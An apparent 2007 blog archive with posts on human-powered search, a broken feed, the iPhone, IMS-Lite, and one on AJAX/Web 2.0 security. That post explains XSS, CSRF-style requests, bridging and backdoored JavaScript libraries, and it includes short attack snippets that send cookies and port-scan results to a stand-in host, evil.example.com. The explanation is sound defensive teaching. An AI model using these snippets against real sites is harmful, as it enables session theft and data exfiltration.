
Saturday, January 27, 2007

Why Artificial Intelligence if you can have Peer-Peer Intelligence ?




It is interesting to note how competitive the search world is getting. The eternal quest for ‘finding the right answer’ is leading this technically advanced generation back to the basics – why not utilize the intelligence of the actual human brain that we are all trying to simulate ?

Solutions like the recently discontinued ‘Google Answers’ and the currently blossoming Yahoo Answers are examples where you can ask targeted questions to ‘experts’, who can provide you with educated answers. However, in this model, the ‘experts’ are usually more qualified than the average Joe. The power of involving real humans comes when you can expand in scale, as well as make it attractive for those contributors in terms of personal profit. In other words, a model that can utilize the ‘spare time’ of millions of people to offer collective intelligence.

Another example of this is LinkedIn’s recently launched Questions tab. For those who don’t know, LinkedIn is a business networking tool that allows you to connect to several industry professionals. I use it a lot as well. Now that LinkedIn has a great network of friends, friends of friends and so on, it makes sense to traverse this network to get targeted information. So they launched LinkedIn Answers, where a person can ask a “Question” and anyone in the network can answer it. Questions range from “What is the one killer-app you would like in your cell phone?” to “How can we make the law more user friendly?”. The answers come from your network, which may include engineers, VPs, CTOs and CEOs of companies, whom you get to tap for information. The answers are detailed, and often fabulous. I bet you couldn’t get the same quality from a plain Google search.

Similarly, Google went the human route for Image Search. While you can apply complex word algorithms to textual articles, how do you provide relevant image search results? How do you know a particular image represents a search query like “long tail theory”? Simple: tap into real humans with the Google Image Labeler. Make it a game, get information in return. Beats the heck out of AI engines.

And then, yesterday, I used ChaCha, the guided search engine. The logic here is again simple: utilize the free time of millions of peers – and have them search for you. They have a huge network of guides, and one guide can invite another. When you launch a ChaCha search and choose the guided option, a real user responds and chats with you to refine the search. I spent the day talking to several of them – they are real people, who get paid for the hours they log into ChaCha. Depending on which ‘level’ they are graded at (a function of user feedback on their search report, and other factors), they can earn anything between $5 and $10 an hour. I talked to one guide, a mother of three, who says she loves this ‘part-time job’ – when she needs some extra cash, she logs in, helps people and earns money. When they get ‘promoted’ to a higher grade, their pay can double, she says. I asked if they are trained, and I was told they do go through some level of keyword-search training.

Personally, I did not find their level of expertise to be any better than the average user’s (I think I can search far better with advanced search parameters). The challenge for ChaCha, I think, will be to train their people so that more people see a benefit in using their guides. I tested them with search queries for which I already knew the answer and watched how long they took to get me the right one. Still, it is an interesting model – I am sure there are many who would find it useful. It also seems that their payout is heavily based on how I rate their help, so not a single one tried to hurry me. In fact, we even chatted about general things while the guide searched. I wonder, then, if ChaCha-like systems could effectively merge search as a service into a larger social networking tool!
See their blog for other ways to increase your payout using this service.

All in all, it is very interesting to see how the human collective is being utilized to provide further personalization to the world of search. While one may have thought that 'simulated intelligence' would eventually take jobs away from people, I guess the Internet is balancing this well by reaching out to people and offering them new ways to 'mesh into this new world intelligence' and supplement their living. In fact, I was at Internet Telephony last week, where I spoke on the 'Effect of Web 2.0 on the Telco World', and in one of the keynotes, Rich mentioned that this particular event was full of military people, because they wanted to learn how they can use VoIP technology to help those disabled in war earn a living!
Vive-la-Internet.

Wednesday, January 17, 2007

Reader Warning: Messed up Feed


Feb 09 Update: I found a way to fix Blogger's feed sort order. Instead of providing my Atom feed to FeedBurner, I created a Yahoo Pipe to sort my feed and provided the Yahoo Pipe's RSS to FeedBurner. So hopefully, after I make this change, you should not see this old post at the top of the feed. If you do, I have work to do!
Update: Looks like the new Blogger will continue to re-order posts based on update date. Yeesh and !@$!XX!@* again. Read more here.

Folks, sorry, but it looks like the feed for my website is completely messed up, ever since I upgraded to Blogger Beta. I use FeedBurner, which in turn takes its feed from the Blogger feed at http://corporaterat.blogspot.com/atom.xml . If you look at that Atom feed, you will notice that my posts are topsy-turvy: posts are missing and old posts show up front. Of course, I should have researched before I upgraded, but it is too late now - I am at the mercy of Google to fix the RSS.

The positive side: as part of the Blogger upgrade, I now have labels (see sidebar), so you can view posts by category.

Not sure what I can do about it except yell and scream. So please don't forget to visit this site every once in a while to see what's new.

Web 2.0 and AJAX - fundamentally insecure ?



In the past couple of days, I’ve been delving into the supposed security issues that new Web 2.0 and AJAX-enabled sites introduce, and have also been looking into some claims I heard that for serious applications one should stick to Flash, since it is inherently more secure, tried and tested than AJAX is today.

To investigate the inherent and publicized security issues within AJAX, we first need to understand the underlying technologies that AJAX uses. Specifically, AJAX comprises:

a) XMLHttpRequest (XHR) – relatively new functionality, now available in most well-known browsers, that allows an asynchronous communication mechanism between the browser and the web server (a minimal sketch of its use follows this list)

b) Client-side JavaScript – around for a long time, an implementation of the ECMAScript specification, and used as the programming language for many web-based applications
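
To make the discussion concrete, here is a minimal sketch of how XHR is typically used from script. The URL and element id are placeholders I made up, and older IE versions would need the ActiveX fallback, which I have omitted:

    // Minimal asynchronous XHR call ('/data.xml' and 'result' are placeholders)
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "/data.xml", true);           // true = asynchronous
    xhr.onreadystatechange = function () {
      if (xhr.readyState === 4 && xhr.status === 200) {
        // update part of the page without a full reload
        document.getElementById("result").innerHTML = xhr.responseText;
      }
    };
    xhr.send(null);

That is the whole trick behind the ‘responsiveness’ of AJAX sites: small requests fired in the background, with the page updated in place.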

To properly assess AJAX-related security issues, then, it makes sense for us to take a look at what sort of security issues these two critical underlying technologies present.

XSS – Cross-Site Scripting attacks – A Javascript and URL handling exploit

The concept here is straightforward. XSS is not a technology – it refers to a technique where a malicious user constructs an ‘evil’ input which, when passed to a trusted but vulnerable site, causes that site to compromise its users. Consider, for example, a site called www.goodsite.com, which accepts a search query like so: www.goodsite.com/q=mysearch. Now let us assume that goodsite.com does not do a good job of validating the input provided. One could construct a URI like www.goodsite.com/q=(insert malicious script code here) and send it off to goodsite. If goodsite let this pass, the script would, in effect, be executed in the context of the user’s browser session. So, if I were to send you this URI and you clicked it, I could, for example, hijack your session cookie at goodsite and have it sent to me via embedded Javascript (plain Javascript can trigger cross-domain HTTP requests, for instance by setting an image source). If you think this is trivially avoidable, you’d be surprised at how many ways there are to bypass web server checks. For example, take a look at the MySpace exploit that used dynamic HTML and fragmented text blocks to hide substrings that would otherwise get caught by the web server’s parser.
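
To illustrate, here is roughly what the injected payload could look like against my hypothetical goodsite.com. The attacker’s collection server (evil.example.com) is made up, and a real filter would catch this naive form – it is only a sketch of the idea:

    // The victim is tricked into clicking something like:
    //   http://www.goodsite.com/q=<script>...</script>
    // If goodsite echoes the query back unescaped, the injected script
    // runs inside the victim's goodsite session:
    <script>
      // ship the victim's goodsite cookie off to the attacker's server
      new Image().src = "http://evil.example.com/steal?c=" +
                        encodeURIComponent(document.cookie);
    </script>

With the session cookie in hand, the attacker can often impersonate the victim on goodsite until that session expires.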

Ideally, one could argue that this should simply be disallowed, or that all web servers MUST ensure that special characters are ‘safe’-ized (encoded using HTML entities) so that they are only displayed, never interpreted, on the remote side. However, with the increasing popularity of responsive web sites using AJAX-related technologies, mash-ups are becoming very common, and the ability for one domain to pass on data for remote script execution helps in managing load on the local host. XSS-related vulnerabilities have been around for a long time, and have been successful in infecting a variety of web-based solutions, including PHP boards, Google, Apache, Mozilla, MySpace, Yahoo and many more.
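
For what it’s worth, the ‘safe’-izing I have in mind is nothing more exotic than entity-encoding the handful of characters that let markup slip through, before echoing user input back. A hand-rolled sketch follows – a real site should use a vetted library routine rather than this, and htmlEscape and queryFromUrl are names I invented for the example:

    // Naive illustration of HTML-entity encoding before echoing input back
    function htmlEscape(input) {
      return String(input)
        .replace(/&/g, "&amp;")
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&#39;");
    }

    // the search term is now displayed as text, never interpreted as markup
    document.getElementById("result").innerHTML =
        "You searched for: " + htmlEscape(queryFromUrl);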

It is important to note that XSS depends on the following:

a) You somehow pass on a ‘malicious’ URI to a user and get them to click on it (it doesn’t make sense to execute the XSS vulnerability in your own browser context, unless you think you can launch a remote exploit due to a buffer underflow or overflow – that is a different attack, and not categorized under XSS attacks – more on this later)

b) It assumes that the web server receiving this input does not do a good job of validating it


Effect of Web 2.0 on XSS attacks

Does Web 2.0 impact the risks of XSS attacks? Yes and no. Technically speaking, XSS has nothing to do with Web 2.0 and AJAX. It is a vulnerability that existed well before AJAX as a term was even coined; XSS attacks started surfacing almost as soon as Javascript was introduced. However, with the proliferation of Web 2.0 sites there is a significant increase in collaboration, mash-ups and multi-tenancy, which all mean the same thing – there is a larger audience which can now be targeted for vulnerabilities. So the ‘no’ is a technical response and the ‘yes’ is a market response, due to adoption. That is not to say that ‘Web 2.0 results in increased XSS vulnerabilities’. The right statement would be ‘Web 2.0 results in more people using potentially vulnerable technologies, which, unless hardened, have a wider possibility of financial and reputation damage’ (heck, sounds like a lawyer crafted that, but you get what I mean).

In addition, multi-tenancy (different applications on a single cluster of hosts) means an exposed vulnerability in one application can compromise others, unless the multi-tenant host takes very special care of intra-trust-domains (providers usually do a good job of inter-trust-domains, but lag on trust within their own domain, which is why once you get in, you can usually do a lot of damage to peripheral nodes).


XMLHttpRequest (XHR) & Javascript Repudiation Attacks

This is really a derivative attack on an already compromised site (it is interesting to note that most of these attacks rely on implementation gaps in web servers). Assuming you manage to get malicious script code running, you can use XHR to issue as many HTTP requests as you like that automatically ‘agree to some terms of service’, ‘buy an item’ and so on – anything that does not require specific user input unknown to the environment. The exact same thing is also possible with plain Javascript, so this is not really specific to AJAX (the only new thing AJAX brought in was XHR – Javascript existed much before that). Since the web server cannot tell whether a request came from an embedded XHR call or an explicit user click, it is not possible to differentiate between the two.
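
For instance, once script is running inside the victim’s session, something as small as the following could silently ‘click’ an agree button on the victim’s behalf. The URL and form parameter are invented for illustration; the point is only that this request rides on the victim’s existing session and looks, to the server, like any other:

    // Hypothetical: fires a request the server cannot distinguish
    // from a genuine user action, using the victim's existing session
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "/account/acceptTerms", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.send("agree=yes");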


Effect of Web 2.0 on Repudiation Attacks

Once again, with the hype and slickness of XHR+JS applications proliferating around the web, more people should concentrate on architecture and data protection instead of focusing only on ‘how to make the interface slicker’. So again, Web 2.0 does not technically make the situation worse, but in the surge of trying to get prettier applications out, developers need to go back to basics on implementing a secure environment for distributed systems and on input validation.

(AJAX) Bridging

Bridging is a software concept that long pre-dates Web 2.0. In effect, it is the process of installing a ‘gateway server’ in between multiple content sources. This gateway server maintains a trusted relationship with the backend content servers and is therefore also capable of holding the integration logic for how to ‘mesh’ these diverse contents together. This sort of bridging has increased in popularity with the deployment of mash-up applications.

It introduces another twist to XHR attacks. XHR cannot access HTTP pages outside the domain from which the page is being served. For example, if a script is running at www.google.com, XHR can’t make an HTTP request to www.yahoo.com. However, if the application is hosted on a bridge server, one could use the bridge server’s URI to reach content on the other backend site (for example, if the bridge server knowingly or unknowingly supports URI redirection). Do note that plain Javascript also supports this kind of cross-site request, so you don’t strictly need XHR for it; XHR simply gives an attacker one more route if the older tricks are filtered or blocked. What happens then is that, by a transitive trust relationship, if Yahoo were to offer its APIs to a trusted site, users of that trusted site could now target attacks at Yahoo using common tricks like SQL injection, DoS (repeated bulk HTTP requests via XHR) and similar.
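
Here is a rough illustration of the difference. All the hostnames and the /proxy parameter are hypothetical: the direct cross-domain call is refused by the browser, while the same request laundered through a permissive bridge goes out as an innocent-looking same-origin request and is forwarded onwards with the bridge’s standing:

    // Running inside a page served from bridge.example.com
    var direct = new XMLHttpRequest();
    // Blocked by the browser: XHR may not talk to a different domain
    // direct.open("GET", "http://api.othersite.com/data", true);

    var viaBridge = new XMLHttpRequest();
    // Allowed: same-origin request; if the bridge blindly forwards 'url'
    // to the backend, whatever the attacker puts there reaches the
    // trusted site carrying the bridge's credentials
    viaBridge.open("GET", "/proxy?url=" +
        encodeURIComponent("http://api.othersite.com/data?id=1'--"), true);
    viaBridge.send(null);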

Effect of Web 2.0 on XHR Bridging Attacks

Web-based mash-up applications are proliferating today. The use of bridge servers to blend content from multiple sites is getting much more commonplace (for instance, mashing Google Maps with Craigslist, house searches and more). In any architecture, the fundamental principle that ‘a chain is only as strong as its weakest link’ applies equally here.

Javascript ‘Script Kiddie’ Tricks

This is a compendium of the many tricks that have plagued immature implementations of Javascript. Many of these tricks are very irritating and can destroy the user experience. For example, Pascal Meunier maintains a list of some of these irritants, which work even today on the most recent browsers, and they include:
a) Dynamically generating a fake page for a valid URI – a simple Javascript trick where, if you visit http://bad.com and click on a link there for ‘google.com’, your browser URL can change to google.com while displaying some other crafted page (it works in IE7; FF2.0 smartly displays the URL redirection)
b) Nasty JS code that traps browser events and does not let you navigate away from the page unless you close the browser (a small sketch of this one follows below)

And more.
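
As a flavour of trick (b), a couple of lines of event trapping like the following are enough to make leaving a page miserable on browsers of this vintage. This is only a sketch; exact behaviour differs between IE and Firefox:

    // nag the user every time they try to navigate away or close the window
    window.onbeforeunload = function () {
      return "Are you sure you want to leave?";  // browser shows a confirm dialog
    };
    // nastier variants also try to bounce the user straight back on unload
    window.onunload = function () {
      location.href = location.href;
    };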

Of course, JS being a programming language, it can also be used for more serious purposes – like port-scanning your own network from inside your browser and potentially reporting the results to an external site.
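
The port-scanning idea is usually done by abusing timing rather than any explicit network API: point an image at an internal host and measure how quickly the load fails. A rough sketch, with the internal address and the reporting URL made up, and with the caveat that the timing heuristics vary a lot by browser and network:

    // crude intranet probe: a fast error often means 'connection refused',
    // a slow one often means nothing is listening at all
    function probe(host, port) {
      var started = new Date().getTime();
      var img = new Image();
      img.onerror = function () {
        var elapsed = new Date().getTime() - started;
        // report the guess to an external collector (hypothetical URL)
        new Image().src = "http://evil.example.com/log?h=" + host +
                          "&p=" + port + "&t=" + elapsed;
      };
      img.src = "http://" + host + ":" + port + "/favicon.ico";
    }
    probe("192.168.1.1", 80);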

Effect of Web 2.0 on JS Vulnerabilities

Most of the Web 2.0 world relies heavily on Javascript. In fact, I can point you to hundreds of sites that blindly download ‘JS+XHR (AJAX) toolkits’ like prototype.js and start using their functions. Just as an example, prototype.js is a 64KB file densely packed with XHR and JS code. How many people actually look into that file? What stops me from hosting a malicious prototype.js, having people download it and use it in their own context, and having their context-sensitive information sent out? With the increasing use of JS in commercial sites in the quest for a better user experience, the inherent implementation gaps of JS interpreters in browsers can do much more damage, simply because JS is now used in many more mainstream functions than before.
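
To make the point concrete, imagine a copy of a popular toolkit in which one commonly used helper has been quietly wrapped. This is a made-up illustration (the function name and collection URL are invented), not a real flaw in prototype.js:

    // hypothetical backdoored 'toolkit' helper: looks like a normal Ajax
    // wrapper, but mirrors every request and the session cookie elsewhere
    function ajaxGet(url, onSuccess) {
      var xhr = new XMLHttpRequest();
      xhr.open("GET", url, true);
      xhr.onreadystatechange = function () {
        if (xhr.readyState === 4 && xhr.status === 200) {
          // the covert part: leak what the application just fetched
          new Image().src = "http://evil.example.com/collect?u=" +
                            encodeURIComponent(url) + "&c=" +
                            encodeURIComponent(document.cookie);
          onSuccess(xhr.responseText);
        }
      };
      xhr.send(null);
    }

An application that pulls such a file from an untrusted mirror would behave perfectly normally while leaking data on every call.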

XHR+JS insecurities vs. Flash

Comparing this to Flash: when I googled around for vulnerabilities, most of the ones I came across were to do with buffer exploits. Simply put, buffer exploits are a set of techniques where a malicious user finds a spot of executable code that does not check input length and feeds it a string large enough to overflow the buffer allocated for it on the stack. The string is also crafted with machine opcodes in the right places, so that the function’s return address ends up pointing back into the string itself, which is really an encoded set of instructions. Effectively, the attacker has managed to execute code on the remote platform, thereby launching an attack from the inside. Such attacks are very old and still prevalent. A great tutorial (old, but gold) on buffer exploits can be read here.

So while I found such buffer exploits, I did not have much success finding ActionScript-related exploits similar in nature to those mentioned above. I did find references in random forum posts saying that a few years ago ActionScript in Flash was in a similar stage, but it seems the implementation has improved over the years. Again, this was a cursory look – I’d be happy to be pointed to similar exploits in the Flash world.

Buffer exploits will always remain, but finding and exploiting them does not need an open programming-language interface like JS. These exploits require more skill to probe and compromise (yes, I am aware of automated buffer-exploit scanners, but applying them to different environments still requires skill) and are usually an art practiced by a smaller niche community.

However, in the entire Flash vs. AJAX security debate, I do have another concern. JS and XHR exploits need to be fixed by the ‘browser’ owners – Microsoft, Mozilla, Apple and others. Flash exploits need to be fixed by Adobe, and can be fixed independently of the browser, since Flash is a third-party browser plugin while JS and XHR are core browser implementations. I wonder whether relying on browser companies to fix issues takes longer than relying on Adobe to fix a plugin issue. Anyway, as Web 2.0 with AJAX continues to go mainstream, only time will tell.

Conclusion

What we observe, then, is that most of the vulnerabilities attributed to AJAX have little to do with AJAX itself and more to do with immature implementations and bad architectural choices by developers. Most of the vulnerabilities above boil down to:

a) User input is not validated well
b) Data integrity and logical firewalling are not thought out well
c) Current implementations of Javascript in browsers are rather dismal
d) If your architecture is insecure, no technology can rescue you

What Web 2.0 is doing is making these technologies mainstream. As more people use them, more bugs come out, and more people think of hacking insecure sites for fun and profit (nothing new there). I think overall this will be beneficial for the web community - there is nothing like taking a technology mainstream to make it robust! But in the process, developers and marketers need to be aware that this is an evolving process and should do everything possible to safeguard their own data from the imperfections in the implementations of their chosen tools.

References
http://namb.la/popular/tech.html
http://ajaxian.com/by/topic/security/
http://www.technicalinfo.net/papers/CSS.html
http://insecure.org/stf/smashstack.html
http://www.actionscripthero.com/adventures/
http://www.viruslist.com/en/analysis?pubid=184625030

Thursday, January 11, 2007

iPhone: The world's best micro-tablet ... not Phone





So by now, everyone must have been poring over and arguing about the iPhone that Apple released at CES (oops) Macworld. If you missed the master presenter, you can see Steve Jobs' video here.

As I see it, the iPhone is a marvelous design. No question about it. In fact, when Steve started by saying "The killer app is making a call!" I thought he got it exactly right. Consumers want good voice, easy use and reliable communication. But then, as he went on to talk about photo albums, using two fingers to zoom in and out, and so forth, I wondered what it had to do with 'making a call'. Having said that, I thought the random-access voicemail feature is very nice and very useful. Of course, this is a feature that is not restricted to the iPhone - I bet it will come to all phones with even the smallest LCD, since this is really a network-side feature.

How much the iPhone means to you depends on whether you consider your phone a 'lifestyle' device or a 'communication' device. When the iPod was released, it effectively turned around the portable music player industry as we knew it. A lot of that was attributed to its design, but an equal amount of importance was attributed to the tactile feedback and responsiveness of its 'clickwheel'.

Now don't mistake me for an 'old timer' - in my professional job, I am neck deep in mobile applications and am rather excited about the new applications one could potentially host on the iPhone, considering its excellent video and screen size. But I do feel that the iPhone is not a revolution for the phone industry, and here is why:

a) Mobile internet usage worldwide generates only a small fraction of the revenue of voice calls - too small to justify a 'communication' device that is better at surfing than at voice calling (in other words, not that many people actually surf the net on their phone; specifically, I recently read a report which cites US mobile internet penetration at 19% and the EU at around 24% - I apologize, I don't have the link for the source right now). So I'll bet a vast majority of people in the world need a good phone far more than a good photo-album device, if they can carry only one device in their pocket. (see this too)

b) If you look at worldwide sales of mobile devices, it is interesting to note that Nokia, Samsung and pretty much all of the major players state that the bulk of their revenue comes from low-tech phones - no fancy LCDs, no fancy touchscreens. While they all see a rise in sales of smartphones, competition on the other hand also drives down their prices. Again, these figures simply describe a global market trend across a wide spectrum of user profiles. It is not necessarily the intent of smartphones to overtake sales of 'dumb-phones', but it is an observation of user trends nonetheless.

c) Tactile feedback is of utmost importance. Take the case of TV remotes. All-LCD remotes have been around for a good while, yet their sales are minuscule compared to plastic-key remote controls. Do you know why? People don't want to have to keep looking at the device all the time to do things. When I get a call while driving, I feel around for my 'answer' key and hit it. As I type this post, not once am I looking at the keyboard - I feel the keys and their locations, and the tactile feedback makes my typing much faster. You know what has the potential to change the landscape of the phone industry and yet keep tactile feedback? How about shape-changing plastic? But who knows when that will be ready for consumer-grade use. A touch-screen LCD is a touch-screen LCD, no matter how many applications you stuff into the iPhone.

d) Multi-touch sensors are really very nice. When I first saw Jeff Han's demo at TED (here), I was very impressed. But I am not sure how great multi-touch is on a screen as small as the iPhone's. People get carpal tunnel syndrome from holding their thumb out for the spacebar on a regular keyboard. I wonder what new syndromes will be discovered as users start using two fingers to 'squeeze' or 'expand' their browser screen :-) Yes, I saw Minority Report, and Tom Cruise's multi-touch virtual screen was fabulous. But that was a 72-inch giant, not a little pocket screen.

e) I hate grease and smudges on my phone :-) Between calls, I keep rubbing my BlackBerry screen against my shirt, with the keyboard locked. Gee, the finger slide to unlock the iPhone looks easy to bumble, and there is so much more LCD real estate for me to smudge. I know Apple has used as smudge-free a screen as possible, but 'smudge-free' is a bit like 'wrinkle-free' - not really.

f) Again, repeating Mr. Jobs' first statement, 'The killer app is making a voice call', I don't think the iPhone really believes it, considering its quoted battery life of 5 hours.

g) Umm, really, what happens when it falls on the floor ten times in a month? It happens! I keep my phone in my pocket all the time, and when I bend down, out it pops with a loud thud onto the floor.

So all in all, for me, my ONE communication device needs to be:
a) Foremost, an easy-to-use phone with great, clear voice quality
b) Able to withstand falls (I don't claim to drop it from 3-storey buildings - just the usual pop out of the pocket)
c) Equipped with tactile feedback, so I don't always need to see what I am doing

I am glad that they chose to go with GSM. I know in the US, GSM's coverage is still not as good as CDMA, despite Cingular's claims, but I think it is the right direction.

So finally, to me the iPhone is a great secondary device, and for those who value making a statement more than effective use, it would be great. And it does need to be mentioned that Apple is not the first here - the Asian market has had innovative touch-screen designs for mobile devices for a while. If you visit Korea or Japan, you will know what I mean. Of course, they don't follow up with the fabulous marketing we see here in the US. If you don't believe me, google the LG KE850.

Of course, the iPhone does not need to be a phone replacement to be successful. The success of the BlackBerry was that it offered push email, a great keyboard and a scroll wheel - its phone quality wasn't as great as traditional cell phones'. I can quite see the iPhone being an immediate hit in Hollywood, as well as with teens with rich parents.


But I wonder if, instead of 'phone revolution', 'micro-tablet revolution' (one that also makes calls) is a more apt title?

(Update on Sep 14 2007)

It looks like people keep re-discovering this post on the iPhone. With the successful release of the phone, and the subsequent $100 credit and $200 price drop, it is natural that people are on the lookout. Since this post was mostly postulation on my part - it was authored before the iPhone was released - several folks have sent me emails asking what I think now, assuming I have tried it. So here are some responses:


a) Have I tried it? Yes, many times. I kept it with me for a couple of days too, so I could make sure I got a good feel for it (you know, sometimes irritants are just things one needs to get used to).

b) Will I buy it ? Not yet. Not because of the price - I am known to spend a lot of money on gadgets :-). But because of the following:

b.1) Typing is a big pain. No tactile feedback. Typing on virtual keys is very slow (compared to a BlackBerry), and even after a few days I kept pressing the wrong keys. Drag-typing works, but that's really slow typing.
b.2) No corporate email integration yet (I hear they are working on it)
b.3) Audio quality is at the same level as a BlackBerry (which is not that great). If its audio were significantly better, that would be a great incentive.

c) Did any of my opinions change after using it? Well, yes - one: the smudge part. It is very easy to smudge the iPhone, but also very simple to wipe it off with any cloth. So it did not bother me as much as I thought it would.

Tuesday, January 9, 2007

IMS-Lite

(this post is somewhat ad-hoc right now. I may clean it up later)

Okay, after reading Engadget's report on Steve Jobs' Macworld 2007 iPhone keynote, I really don't feel like talking about bellhead technology, but here goes...


Just about when a set of specifications gets too ambitious and onerous, a vendor’s engineering department concludes that they really need something ‘leaner’ for their particular market. At the same time, the marketing department wants to ride the wave of popularity by associating their ‘leaner’ product with a well-known acronym. As a result, you get xxx-Ready or xxx-Lite, where the former effectively means ‘we don’t support xxx yet, but we sure can, since our product has great open interfaces and was architected by the best architects in the world, believe us’, and the latter effectively means ‘we sliced and diced xxx, selected the parts we need, threw the others away, and it may not really be 100% compliant with xxx, but it is 100% compliant if you use us and our partners exclusively’.

‘IMS-Lite’ is a term that is floating around in the market today and is being used by several vendors to describe a ‘subset’ of functionality, as well as ‘tweaks’ to the base specs to suit their needs. Of course, there is no standard for IMS-Lite; if there were, it would be as complex as the base IMS specs themselves. Different vendors and operators have different takes on IMS-Lite, depending on which network is their primary deployment requirement. Most of the IMS-Lite terminology comes from non-cellular operators who don’t want to carry all the baggage of the cellular world but want to be able to interconnect. It is interesting to note that the core specs actually make most of the points stated below optional, but all the examples and deployments use them, since they are deployed by cellular operators, and hence one gets the feeling that all of these features must be supported.

Here is a brief on various 'thoughts' on what an IMS-Lite should look like (not specific to any vendor):

Architecture
  • Merge the P-, I- and S-CSCF into one entity; call it the ‘Call Router’ if you wish. Even though they are logical functions, the interactions between them are one too many – let vendors decide how they implement the internal functions, as long as externally they support SIP and DIAMETER. This alone reduces the specs significantly.
  • Ditch the Initial Filter Criteria – the iFC is the XML spec and workflow for how a CSCF selects an appropriate AS and/or performs local services like call barring. Why does it matter how the filtering is implemented? Let it be a vendor decision.
  • Abstract the HSS – one of the biggest pain points for non-cellular operators, such as enterprises, in connecting to IMS is that there is no way they are willing to share their user data and have it hosted in an operator’s network. So allow data federation: allow a mechanism where the ‘central data store’ can be located in either the master or the access network, and define a security protocol between the master and access networks to support such federation.
  • Kill the ‘OSA-SCS’ and ‘IM-SSF’ application servers – which magically convert OSA and CAMEL services to SIP. I don’t know how such magic can effectively happen; non-SIP services don’t have a 1-1 mapping to SIP flows. If one needs to provide non-SIP services, hand the call off to a terminating SIP UA server that knows how to maintain the service state of the non-SIP protocol on the other side. In other words, the ‘OSA-SCS’ and ‘IM-SSF’ define functionality that the gateway AS will do anyway.
  • Move the concept of ‘Home’ and ‘Visited’ to an appendix. Unless it is an expensive over-the-air proposition, it doesn’t really matter, from the signaling plane, if I am calling from Tahoe and my ‘home’ network is in Timbuktoo. From a media perspective, however, it does matter, especially if media MUST route through a media node for bandwidth allocation and lawful intercept. These, however, are public-operator requirements and are not mandated in enterprises, for example.
  • When a UE registers, have it negotiate how it will report charging. The reason is simple – IMS defines an extensive, distributed method of charging for on-line and off-line systems. In cases where the network can guarantee that all calls and/or media will flow through its nodes, the charging participation required from the end nodes is much reduced.

Identity
  • The entire USIM/ISIM algorithms need to be pushed to an appendix. How one computes one’s ‘public’ identity is a network matter. For example, enterprise phones are ‘provisioned’ with static identities – there is no SIM card.

Security
  • Make 33.203 an option, not a strong reference, and instead do a good job of 33.978. In other words, don’t require implementations to exchange a two-way IPsec SA with the P-CSCF; many networks can depend on the underlying layer’s security. 33.978, the ‘early IMS security’ spec, is a start, but it does not yet support WLAN-based UE authentication, for example.
  • Specify HTTP Digest as another allowable authentication method – it works just fine assuming that a lower layer provides encryption, which is very common in enterprises.

Nits
  • For lord’s sake, provide examples of simple call flows without preconditions in 24.228 (the IMS signalling flows document)! For example, did you realize why the UPDATE is needed before the 180 Ringing on the remote side? It is to ensure that the remote phone does not ring its user only to have the call dropped because bandwidth could not be reserved.
I could go on and on... especially when discussing behemoth efforts such as Voice Call Continuity, PTT and the rest of the services.
But wait, what is that you say? “What you are proposing is what already exists today in wireline SIP/VoIP deployments, and that is not really IMS.” Gee, maybe you are right. And maybe that is what IMS-Lite is? But seriously, I think IMS would benefit from abstracting a lot of the cellular-specific procedures out of its core specifications, if it now desires to be used across multiple access strata.